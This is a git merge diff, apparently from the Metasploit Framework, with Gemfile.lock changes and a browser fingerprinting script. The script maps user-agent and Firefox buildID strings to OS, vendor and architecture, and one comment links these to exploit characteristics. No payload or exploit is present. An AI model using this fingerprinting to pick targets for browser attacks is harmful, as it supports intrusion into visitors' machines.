Merge branch 'master' into staging/rails-4.0
Conflicts: Gemfile Gemfile.lock metasploit-framework.gemspecbug/bundler_fix
commit
25d1caabb5
|
@ -61,6 +61,7 @@ PATH
|
|||
nokogiri
|
||||
packetfu (= 1.1.9)
|
||||
railties
|
||||
recog (~> 1.0)
|
||||
robots
|
||||
rubyzip (~> 1.1)
|
||||
sqlite3
|
||||
|
@ -137,7 +138,7 @@ GEM
|
|||
multi_json (~> 1.3)
|
||||
hike (1.2.3)
|
||||
i18n (0.6.11)
|
||||
jsobfu (0.2.0)
|
||||
jsobfu (0.2.1)
|
||||
rkelly-remix (= 0.0.6)
|
||||
json (1.8.1)
|
||||
mail (2.6.1)
|
||||
|
@ -184,6 +185,8 @@ GEM
|
|||
rake (>= 0.8.7)
|
||||
thor (>= 0.18.1, < 2.0)
|
||||
rake (10.3.2)
|
||||
recog (1.0.0)
|
||||
nokogiri
|
||||
redcarpet (3.1.2)
|
||||
rkelly-remix (0.0.6)
|
||||
robots (0.10.1)
|
||||
|
|
|
@ -1,19 +1,21 @@
|
|||
|
||||
// Case matters, see lib/msf/core/constants.rb
|
||||
// All of these should match up with constants in ::Msf::HttpClients
|
||||
var clients_opera = "Opera";
|
||||
var clients_ie = "MSIE";
|
||||
var clients_ff = "Firefox";
|
||||
var clients_chrome= "Chrome";
|
||||
var clients_safari= "Safari";
|
||||
var clients_opera = "Opera";
|
||||
var clients_ie = "MSIE";
|
||||
var clients_ff = "Firefox";
|
||||
var clients_chrome = "Chrome";
|
||||
var clients_safari = "Safari";
|
||||
|
||||
// All of these should match up with constants in ::Msf::OperatingSystems
|
||||
var oses_linux = "Linux";
|
||||
var oses_windows = "Microsoft Windows";
|
||||
var oses_mac_osx = "Mac OS X";
|
||||
var oses_freebsd = "FreeBSD";
|
||||
var oses_netbsd = "NetBSD";
|
||||
var oses_openbsd = "OpenBSD";
|
||||
var oses_linux = "Linux";
|
||||
var oses_android = "Android";
|
||||
var oses_windows = "Windows";
|
||||
var oses_mac_osx = "Mac OS X";
|
||||
var oses_apple_ios = "iOS";
|
||||
var oses_freebsd = "FreeBSD";
|
||||
var oses_netbsd = "NetBSD";
|
||||
var oses_openbsd = "OpenBSD";
|
||||
|
||||
// All of these should match up with the ARCH_* constants
|
||||
var arch_armle = "armle";
|
||||
|
@ -33,6 +35,8 @@ var os_detect = {};
|
|||
os_detect.getVersion = function(){
|
||||
//Default values:
|
||||
var os_name;
|
||||
var os_vendor;
|
||||
var os_device;
|
||||
var os_flavor;
|
||||
var os_sp;
|
||||
var os_lang;
|
||||
|
@ -120,11 +124,10 @@ os_detect.getVersion = function(){
|
|||
// Android 2.3.6, opera mini 7.1
|
||||
// Opera/9.80 (Android; Opera Mini/7.29530/27.1407; U; en) Presto/2.8.119 Version/11.101.10
|
||||
if (navigator.userAgent.indexOf("Android")) {
|
||||
os_name = oses_linux;
|
||||
os_flavor = "Android";
|
||||
os_name = oses_android;
|
||||
} else if (navigator.userAgent.indexOf("iPhone")) {
|
||||
os_name = oses_mac_osx;
|
||||
os_flavor = "iPhone";
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPhone";
|
||||
}
|
||||
break;
|
||||
// A few are ambiguous, record them here
|
||||
|
@ -162,28 +165,28 @@ os_detect.getVersion = function(){
|
|||
// "Version" in the UA, see example above. Grab the webkit version
|
||||
// instead. =/
|
||||
if (platform.match(/ipod/)) {
|
||||
os_name = oses_mac_osx;
|
||||
os_flavor = "iPod";
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPod";
|
||||
arch = arch_armle;
|
||||
search = "AppleWebKit";
|
||||
} else if (platform.match(/ipad/)) {
|
||||
os_name = oses_mac_osx;
|
||||
os_flavor = "iPad";
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPad";
|
||||
arch = arch_armle;
|
||||
search = "AppleWebKit";
|
||||
} else if (platform.match(/iphone/)) {
|
||||
os_name = oses_mac_osx;
|
||||
os_flavor = "iPhone";
|
||||
os_name = oses_apple_ios;
|
||||
os_device = "iPhone";
|
||||
arch = arch_armle;
|
||||
} else if (platform.match(/macintel/)) {
|
||||
os_name = oses_mac_osx;
|
||||
arch = arch_x86;
|
||||
} else if (platform.match(/linux/)) {
|
||||
os_name = oses_linux;
|
||||
|
||||
if (platform.match(/x86_64/)) {
|
||||
arch = arch_x86_64;
|
||||
} else if (platform.match(/arm/)) {
|
||||
// Android and maemo
|
||||
arch = arch_armle;
|
||||
} else if (platform.match(/x86/)) {
|
||||
arch = arch_x86;
|
||||
|
@ -191,9 +194,9 @@ os_detect.getVersion = function(){
|
|||
arch = arch_mipsle;
|
||||
}
|
||||
|
||||
|
||||
// Android overrides Linux
|
||||
if (navigator.userAgent.match(/android/i)) {
|
||||
os_flavor = 'Android';
|
||||
os_name = oses_android;
|
||||
}
|
||||
} else if (platform.match(/windows/)) {
|
||||
os_name = oses_windows;
|
||||
|
@ -318,13 +321,17 @@ os_detect.getVersion = function(){
|
|||
}
|
||||
if (version.match(/Windows/)) {
|
||||
os_name = oses_windows;
|
||||
// Technically these will mismatch server OS editions, but those are
|
||||
// rarely used as client systems and typically have the same exploit
|
||||
// characteristics as the associated client.
|
||||
switch(version) {
|
||||
case "Windows NT 5.0": os_flavor = "2000"; break;
|
||||
case "Windows NT 5.1": os_flavor = "XP"; break;
|
||||
case "Windows NT 5.2": os_flavor = "2003"; break;
|
||||
case "Windows NT 6.0": os_flavor = "Vista"; break;
|
||||
case "Windows NT 6.1": os_flavor = "7"; break;
|
||||
case "Windows NT 6.2": os_flavor = "8"; break;
|
||||
case "Windows NT 5.0": os_name = "Windows 2000"; break;
|
||||
case "Windows NT 5.1": os_name = "Windows XP"; break;
|
||||
case "Windows NT 5.2": os_name = "Windows 2003"; break;
|
||||
case "Windows NT 6.0": os_name = "Windows Vista"; break;
|
||||
case "Windows NT 6.1": os_name = "Windows 7"; break;
|
||||
case "Windows NT 6.2": os_name = "Windows 8"; break;
|
||||
case "Windows NT 6.3": os_name = "Windows 8.1"; break;
|
||||
}
|
||||
}
|
||||
if (version.match(/Linux/)) {
|
||||
|
@ -343,17 +350,17 @@ os_detect.getVersion = function(){
|
|||
var buildid = navigator.buildID;
|
||||
|
||||
switch(buildid) {
|
||||
case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008041514": ua_version = "3.0.0.b5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008041515": ua_version = "3.0.0.b5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2008052312": ua_version = "3.0.0"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008052906": ua_version = "3.0.0"; os_name = oses_windows; break;
|
||||
case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008052909": ua_version = "3.0.0.rc1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008052912": ua_version = "3.0.0"; os_name = oses_linux; break;
|
||||
case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2008060309": ua_version = "3.0.0"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "2008070205": ua_version = "2.0.0.16"; os_name = oses_windows; break;
|
||||
case "2008070206": ua_version = "3.0.1"; os_name = oses_linux; break;
|
||||
case "2008070208": ua_version = "3.0.1"; os_name = oses_windows; break;
|
||||
case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008071222": ua_version = "3.0.1"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008072820":
|
||||
switch (navigator.productSub) {
|
||||
case "2008072820": ua_version = "3.0.1"; os_name = oses_linux; break;
|
||||
|
@ -362,10 +369,10 @@ os_detect.getVersion = function(){
|
|||
case "2008082909": ua_version = "2.0.0.17"; os_name = oses_windows; break;
|
||||
case "2008091618": ua_version = "3.0.2"; os_name = oses_linux; break;
|
||||
case "2008091620": ua_version = "3.0.2"; os_name = oses_windows; break;
|
||||
case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008092313": ua_version = "3.0.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008092416": ua_version = "3.0.3"; os_name = oses_linux; break;
|
||||
case "2008092417": ua_version = "3.0.3"; os_name = oses_windows; break;
|
||||
case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008092510": ua_version = "3.0.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008101315":
|
||||
switch (navigator.productSub) {
|
||||
case "2008101315": ua_version = "3.0.3"; os_name = oses_linux; break;
|
||||
|
@ -373,63 +380,63 @@ os_detect.getVersion = function(){
|
|||
} break;
|
||||
case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break;
|
||||
case "2008102920": ua_version = "3.0.4"; break;
|
||||
case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny)
|
||||
case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_vendor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny)
|
||||
case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break;
|
||||
case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break;
|
||||
case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break;
|
||||
case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break;
|
||||
case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break;
|
||||
case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break;
|
||||
case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009012615": ua_version = "3.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009012616": ua_version = "3.0.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009021906": ua_version = "3.0.7"; os_name = oses_linux; break;
|
||||
case "2009021910": ua_version = "3.0.7"; os_name = oses_windows; break;
|
||||
case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009030422": ua_version = "3.0.8"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009032608": ua_version = "3.0.8"; os_name = oses_linux; break;
|
||||
case "2009032609": ua_version = "3.0.8"; os_name = oses_windows; break;
|
||||
case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009032711": ua_version = "3.0.9"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009033100":
|
||||
switch (navigator.productSub) {
|
||||
case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009033100": ua_version = "3.0.8"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "2009042113": ua_version = "3.0.9"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
} break;
|
||||
case "2009040820": ua_version = "3.0.9"; os_name = oses_linux; break;
|
||||
case "2009040821": ua_version = "3.0.9"; os_name = oses_windows; break;
|
||||
case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2009042113": ua_version = "3.0.10"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009042114": ua_version = "3.0.10"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2009042315": ua_version = "3.0.10"; os_name = oses_linux; break;
|
||||
case "2009042316": ua_version = "3.0.10"; os_name = oses_windows; break;
|
||||
case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20090427153806": ua_version = "3.5.0.b4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20090427153807": ua_version = "3.5.0.b4"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "2009060214": ua_version = "3.0.11"; os_name = oses_linux; break;
|
||||
case "2009060215": ua_version = "3.0.11"; os_name = oses_windows; break;
|
||||
case "2009060308":
|
||||
switch (navigator.productSub) {
|
||||
case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009060308": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
} break;
|
||||
case "2009060309":
|
||||
switch (navigator.productSub) {
|
||||
case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2009060309": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "2009070811": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
} break;
|
||||
case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "BackTrack"; break;
|
||||
case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_flavor = "PCLunixOS"; break;
|
||||
case "2009060310": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "BackTrack"; break;
|
||||
case "2009062005": ua_version = "3.0.11"; os_name = oses_linux; os_vendor = "PCLunixOS"; break;
|
||||
case "20090624012136": ua_version = "3.5.0"; os_name = oses_mac_osx; break;
|
||||
case "20090624012820": ua_version = "3.5.0"; os_name = oses_linux; break;
|
||||
case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20090701234143": ua_version = "3.5.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20090702060527": ua_version = "3.5.0"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "2009070610": ua_version = "3.0.12"; os_name = oses_linux; break;
|
||||
case "2009070611": ua_version = "3.0.12"; os_name = oses_windows; break;
|
||||
case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2009070811": ua_version = "3.0.13"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "20090715083437": ua_version = "3.5.1"; os_name = oses_mac_osx; break;
|
||||
case "20090715083816": ua_version = "3.5.1"; os_name = oses_linux; break;
|
||||
case "20090715094852": ua_version = "3.5.1"; os_name = oses_windows; break;
|
||||
case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "Oracle"; break;
|
||||
case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_flavor = "CentOS"; break;
|
||||
case "2009072202": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "Oracle"; break;
|
||||
case "2009072711": ua_version = "3.0.12"; os_name = oses_linux; os_vendor = "CentOS"; break;
|
||||
case "20090729211433": ua_version = "3.5.2"; os_name = oses_mac_osx; break;
|
||||
case "20090729211829": ua_version = "3.5.2"; os_name = oses_linux; break;
|
||||
case "20090729225027": ua_version = "3.5.2"; os_name = oses_windows; break;
|
||||
|
@ -439,34 +446,34 @@ os_detect.getVersion = function(){
|
|||
case "20090824085743": ua_version = "3.5.3"; os_name = oses_linux; break;
|
||||
case "20090824101458": ua_version = "3.5.3"; os_name = oses_windows; break;
|
||||
case "2009082707": ua_version = "3.0.14"; break;
|
||||
case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86_64; break;
|
||||
case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Sabayon"; arch = arch_x86; break;
|
||||
case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2009090216": ua_version = "3.0.14"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20090914014745": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20090915065903": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86_64; break;
|
||||
case "20090915070141": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Sabayon"; arch = arch_x86; break;
|
||||
case "20091007090112": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20091007095328": ua_version = "3.5.3"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2009101600":
|
||||
switch (navigator.productSub) {
|
||||
case "2009101600": ua_version = "3.0.15"; break; // Can be either Mac or Linux
|
||||
case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "SUSE"; arch = arch_x86; break;
|
||||
case "20091016": ua_version = "3.5.4"; os_name = oses_linux; os_vendor = "SUSE"; arch = arch_x86; break;
|
||||
} break;
|
||||
case "2009101601": ua_version = "3.0.15"; os_name = oses_windows; break;
|
||||
case "20091016081620": ua_version = "3.5.4"; os_name = oses_mac_osx; break;
|
||||
case "20091016081727": ua_version = "3.5.4"; os_name = oses_linux; break;
|
||||
case "20091016092926": ua_version = "3.5.4"; os_name = oses_windows; break;
|
||||
case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "20091020122601": ua_version = "3.5.4"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2009102814":
|
||||
switch (navigator.productSub) {
|
||||
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Mint"; break;
|
||||
case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86; break;
|
||||
case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
|
||||
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "2009121602": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_vendor = "Mint"; break;
|
||||
case "2010021501": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_vendor = "Mint"; arch = arch_x86; break;
|
||||
case "2010021502": ua_version = "3.0.17;xul1.9.0.18"; os_name = oses_linux; os_vendor = "Mint"; arch = arch_x86_64; break;
|
||||
} break;
|
||||
case "2009102815":
|
||||
switch (navigator.productSub) {
|
||||
case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009102815": ua_version = "3.0.15"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
} break;
|
||||
case "20091029152254": ua_version = "3.6.0.b1"; os_name = oses_linux; break;
|
||||
case "20091029171059": ua_version = "3.6.0.b1"; os_name = oses_windows; break;
|
||||
|
@ -474,23 +481,23 @@ os_detect.getVersion = function(){
|
|||
case "20091102141836": ua_version = "3.5.5"; os_name = oses_linux; break;
|
||||
case "20091102152451": ua_version = "3.5.5"; os_name = oses_windows; break;
|
||||
case "2009110421": ua_version = "3.0.15"; os_name = oses_freebsd; arch = arch_x86; break;
|
||||
case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20091106091959": ua_version = "3.5.5"; os_name = oses_linux; os_vendor = "Mandriva"; arch = arch_x86; break;
|
||||
case "20091106140514": ua_version = "3.5.5"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20091106145609": ua_version = "3.5.5"; os_name = oses_freebsd; os_vendor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20091108163911": ua_version = "3.6.0.b2"; os_name = oses_linux; break;
|
||||
case "20091108181924": ua_version = "3.6.0.b2"; os_name = oses_windows; break;
|
||||
case "20091109125225":
|
||||
switch (navigator.productSub) {
|
||||
case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20091109": ua_version = "3.5.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
} break;
|
||||
case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20091109134913": ua_version = "3.5.5"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20091115172547": ua_version = "3.6.0.b3"; os_name = oses_linux; break;
|
||||
case "20091115182845": ua_version = "3.6.0.b3"; os_name = oses_windows; break;
|
||||
case "20091124201530": ua_version = "3.6.0.b4"; os_name = oses_mac_osx; break;
|
||||
case "20091124201751": ua_version = "3.6.0.b4"; os_name = oses_linux; break;
|
||||
case "20091124213835": ua_version = "3.6.0.b4"; os_name = oses_windows; break;
|
||||
case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "2009120100": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "SUSE"; break;
|
||||
case "20091201203240": ua_version = "3.5.6"; os_name = oses_mac_osx; break;
|
||||
case "20091201204959": ua_version = "3.5.6"; os_name = oses_linux; break;
|
||||
case "20091201220228": ua_version = "3.5.6"; os_name = oses_windows; break;
|
||||
|
@ -499,74 +506,74 @@ os_detect.getVersion = function(){
|
|||
case "20091204132459": ua_version = "3.6.0.b5"; os_name = oses_linux; break;
|
||||
case "20091204132509": ua_version = "3.6.0.b5"; os_name = oses_mac_osx; break;
|
||||
case "20091204143806": ua_version = "3.6.0.b5"; os_name = oses_windows; break;
|
||||
case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20091215230859": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "20091215230946": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20091215231400": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20091215231754":
|
||||
switch (navigator.productSub) {
|
||||
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "20091215": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106": ua_version = "3.5.7"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
} break;
|
||||
case "2009121601":
|
||||
switch (navigator.productSub) {
|
||||
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // Could also be Mint x86-64
|
||||
case "2009121601": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010010604": ua_version = "3.0.17"; os_name = oses_linux; os_vendor = "Ubuntu"; break; // Could also be Mint x86-64
|
||||
} break;
|
||||
case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Mandriva"; break;
|
||||
case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
|
||||
case "2009121602": ua_version = "3.0.17"; os_name = oses_linux; os_vendor = "Ubuntu"; break;
|
||||
case "20091216104148": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Mandriva"; break;
|
||||
case "20091216132458": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "20091216132537": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_vendor = "Fedora"; arch = arch_x86; break;
|
||||
case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_vendor = "CentOS"; arch = arch_x86; break;
|
||||
